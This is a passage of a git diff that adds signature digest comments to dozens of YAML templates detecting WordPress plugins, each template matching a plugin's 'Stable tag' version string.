100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b885cd246f9fb3216f360417f9e86e4781c6a614edb92dd43d55fadd4b115657022066301b2be2a4ca80d489db7e3ae5b9bf620c11283e4dfa95de8b0781ac0e5572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..8eca733fa9 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220103fe5c28ad3ac28cb238e54d600b136fd135520a3e33b3bca96bb21d76a45af022100bd35203cbe8aea1f3fb804c43f34cb6a666e1356cf3fa21ed91b1a4bead4371d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..804e0a64b3 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fb74667a3b653dfac98bd348a2e3dea60c627366145def6eb65e7b22ffcf6e1d02210099746b49689cdc5fe242d9a789f8995b82889c40264aa820089b6c339d76f055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..919e783879 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6accdbfccd442da9a0430f5a15e3f682c2db0b9b7d190d79a4a8cf8dc489051022100994bb2518264867bda598c47384d06dbb5fb0ca8ebba776765a59b61b3f51adc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..88c9255d63 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068a08f68017ddf6a92c6752d7913e7d0630497b14817f15cefd84d69bb54f37802202dcafeb04a3bc9c2452487d7cb7cdd0600b5abf41bb25049491aed0c66bc5d05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..7aa1c995ae 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022029cbb84d9753207b18fe550ed6c5f26c1472fed014e408c91b903e705d81fd46022064f5b4779f2ab2c414f007a1ab093d74608e470f104794237a9b0c54fff5e657:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..84d1a3c0f2 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f043fd5fa3349fd243eecf64fd67b8a86564d88ef94ec7346fa108e89788cad022100a8484d125349c90c9b11f76983b5c89e4e4f27f3644bd6d899e92c35b38f4d00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..26a7ab1381 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df97bbba45f43516c28f7559b51dea13b23e354a163006d14a6bfd3b2c6a514b022012cb2669d4267f8ddcf014c5ab48dfdc6cbe70326b3edc03b8e3367c3fe32ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..4edb7b77ad 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f627ee87b0a111c81039f054a65e8ed24c319fd04029b98a38269655cc81a914022100ed088677b7cf4d24d94851deb2ec72feeb772f1cbffe9b1d2a797e1437dca62f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..0828541128 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008017f11f633f13e08b8d231d95e8a66cd0398df41b6dba40c8344da5e4d4f61602203a222d82cf95d18df709be0af986c0b73e0ba3dbec8e74a984ee62e1138f04e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..ec01702d31 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b824556500fe06c2369b62667587ef060da943470a34116c2612997c869b29e022100be277a0777ec4259cfa64f0e836ab9aac9406ad633c0eb4823ab13428816bbe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..0ac50c7314 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022061b684b6ace70738b9880c5f8e897231e015b6db0dc0c7b5257ff0e8b81fc6b7022100d79c3ac7cd7e454377234fedb4b618952c1a84aac54ac3da9b9d0d656473acd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..0065f43615 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a004530430220381ad88368fd5554f56505dbc7fbb2a28186cb3e7336272e36d3af3392eac7dd021f614302bb216c10edb6549d3e740daad905f3dc2056986dc7843cff1fadbf5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..dedb6d5d51 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079bb853a4a0cee414cc04176eb95725e4c3f7c930132761c159ff66fc4fe12d802206e7ae07ac119f0a50c59908c36d50b1d68dd2079bd26cd60d3262de7813e995b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..4f4741ab15 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e72baefdc21360e1c727e9912a5560abbd45f65a48586c0995aa13fe8720008022053906610511a39d3ab476b6d4b0b0ea085d8f19657f27e56b3933f111d03f2e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..12ba6ea72a 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2e220dadab75ca56250423357fb28228696421df601f8cdd9c41ac4918dd6ec0220211686b133e1ba0b61794ad682fbd51500a70fd5ca6ed596f610201b738a109f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..fe48476550 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017e742c7125f4e530302578b6f9008547e274e1247448c72352561433b8bae1f022100a1c5db93ae7d9ef2f2492e9598d68898dc34b603ac4890fbeda3d7da2e3f8c3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..e172b25317 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c3a8d06708e4779fa04e3122480e7733957436e3ef912225af741191f6434963022032271bd6e6ae8a57a47108403cb114f73f828e027120600a8a5b4ce22eadb5b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..a8a2534f69 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022016f1e8a8e7bfa27404655073880a91535d35cd9cd4f120c2fb50762809f57dab0221009628bfa0a7804b25bf2740399b6a57a15f20d416a5e31e6b064c8b2599a26381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..2c382fe922 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eea30c5e2d372a45905121d1397b38adb7d0a7f0982996c8b492c5b1fd7f5af002203dd2bf76883dd41ec20b617c74370020014013cca19754efd68888f12983ad73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..f6068a5a39 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009a721a748dec3cb189dd1c8b409339aec87a00b15b3c069a8a505bd02e993f13022100cc4cc4c153fe551cef5d6313b92bea7472e37be68637cae0c0292b9655715ade:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..f2b79c186a 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210098181c08941bd8ad4247b9b4c32ad04b61bd4b71dadf164a94aa8f10a858813a022067b117788915718cb4a37ae68999a114548c7c9513355fabcf9a7ac16a3d3802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..ef0b86899f 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b8b5e58e8caf38be8445341c6c08487a77f136da60d59c5ebf9fe8457c1fd222022100cdf24d7b2e6838058d3bb619802fbc9673aec925f45bbaff69ed52ef1c72d787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..d9d7862473 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022079b9363108db9cb5fafe22adbd418c6e415e79f5733a5f3f403c7c4ac9c1724e0221009351fab80b2e98dbd64df962eecd64b076ddeb5895e965054bb49befa24bbbae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..d16447f8bd 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f47fd2f7785bf7066283f3acc7e97a858ebe09d07a017c6dbdc7028f13b99949022100cf0ce81dac8663ed086e2062e11a1d1e3974d134665ef4b5abecb984a4226398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..f65342b2ae 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e3fef602f1440f42cdd4881832e2fda4092c09976e3acb8491f372eb4310e38022001b789bd6c63171818753a53bb96b3af42fc2ffb24ea32e95e4da79f1871baff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..e1ceb1eeeb 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bda966e2f74559d0645c504021b0f47d3d01bf97bbbb35cbe5d298c29c4e968f02206f4f9bb307ff4a187b10165d68e452ee46e8a28bcde0d9312a4c80e5a3c8ed33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..f385af75b2 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022041db9392026455be1d7ba8bb8e558e78b6765693982c20269d187a7d5435127a022100a4412e1cdcb0caba5d7e3ed32f4bc9f625b7fa819a42b08986783cfdb3e838b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..d55320da3c 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a3774e3651f2b0bb2797946add601ab969f49fdde41e587d0bdcf550597c1437022100bfa3f14a76c4fff836a01fa0639297894459a6e019e5c5b16a35dc0e0cc68fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..1b9e456bec 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100be5877ff1833524246b20116d568e0a4f856cf36a1c1c0c845eceb1cdc851c41022100b8afba9fa19b3f95384cdc6624a3c6e4dfd26725e16348a9cc59bfd38c4299a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..231e8a0331 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b9fd797e55a6779db63351cefe1a9766011e49f49d352f065a7bc4140da0157c02202433ad11f380997a3de5e2ecec111dbdf6ba31763c447f988e1f6a740d1dd9af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..73838c59fb 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e6f814576d996edbdc93820332afb882e7bcecda634b6bc761ad3206c877e3e022100979f02c77cab178d0b3c0840ca33320329bc916e4e2716470c64f1a902acd2f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..f790e3855d 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220342561b9c90ae564534028145058258bc286720e13e2208d6e4550655af0f21e022100d9409774e1cb7a99066406e96f73d6f0ea77e7b6fdf2e2999ffedd0e55f24d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..245f2db21c 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207036bdc949e6e7fd961d4bd1c93170bdc8fd25fbe3edacef8005369a31ebe7dd0220071f780f263d017649cd550762f7b9bdb76ccf0bf8567c0f72b9a8db66d2f95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..e0039c284d 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec42e1a0b5ce81a038e98d7edea577f5b262b00805e86581841fb3937b3b4e9d022100b5a3779aeab5916e636762b528b3f940c0815c63d0df611e7b3f7d562aac9c82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..f1e145e3cd 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201152539a2828be423e391471184e7c6d6a54c2a6c204fadf68a6257d55c5dc8c0221009d3fe22ce4e1006258105bb29088fee8d0212b93289c95c79185b3203f128286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..c1ccff22ab 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005058ca82ea5e0f4468161812de0fe3857e93d8b5b7f0e294009a13ce54fca7602203fc441deeba8d222db2b22401384196befada08c36e4e6abac9760c12f2f6e85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..ff5652bac4 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025000ab0fff649e3fbdf51bf18a1188300833b881c9ebdf9c24f59a24812574d022100ef961783c5b562970cf5961f173a07c29fd53012d2808b29ddf67e75e09b90c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..00a83df8d4 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100872d5af466f6bcd56c9987cc3c4c734edde334716c6b6c992fc10106470801f102202c0149996c7169670edd6ef44af83261031b1b209049da6c73df735f40b45dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..2cce0d90c1 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206968f09eeefaeb426385add158d93864313625b9ab69b51bf6931f8b0ebd7a04022049c118f7727ec312472645df35205ca66e9059ee6b8a2eb83427562d3d43fa5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..478f4fbc9a 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e76b98aad6db9fd9d746d4dde4820b7c66cbd56bd0f657edf7d46a050161c58e022100e375e7a1c0f3d25e45f1f3842d7e39f7a58fbc92d94d10b9beba3a6b5407997f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..2d725c755c 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220482f91a2850320030ae712c8fde420600d6237811a4a5893940ef0861f23545002207da145acf033c5457e53d4c75addc71216f4d652a1277dc7bb628ae6a44bba0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..6debae1cf1 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203f0daca2ac7a89e631b89fea3be3ad922b6305eeba9fd1a4c6d03265ae6ec93c022100929d28ac1d120aeba680560a2c133679c649b98248b630826a3f161815cce554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..0dff8a5606 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e120233c3585ec5fbe280b3bf0fc92cfd7cfcb44d2d00ae3e0d3a02a0ff7c9d7022100eed72fd3074c2115bed8755953cbf8a20f22e09ea96a448a3b40112d2364ec36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..4a0e24ad7b 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e91883da47f7b783eed4b2cc14a58f15ab7714764a292fc1cdc057640edbcf0602210092612014c1ee199648d23028aa6f92c0c34ceeda02900e65e46a4b50cd86ba9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..0af454195e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dcc43d88643f8c9d614a760bf1919c479b3f69a2179d492288faefb795bdd22402210096c9168aa1c5c0773bd4b758cec36d4fbffcbc2cbbb014cd06009b6e14751d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..148f97cd5e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f370f8f7cf88c50ee2acc5188cdf10ca4891a0a20c1b7d60753dc3ee4bfa462e022100e3a44b31f0fd4bfb3675a312d5bc0b11e6e8f90c0d2d956a426a97ac66c51a17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..bb11fec137 100644 --- 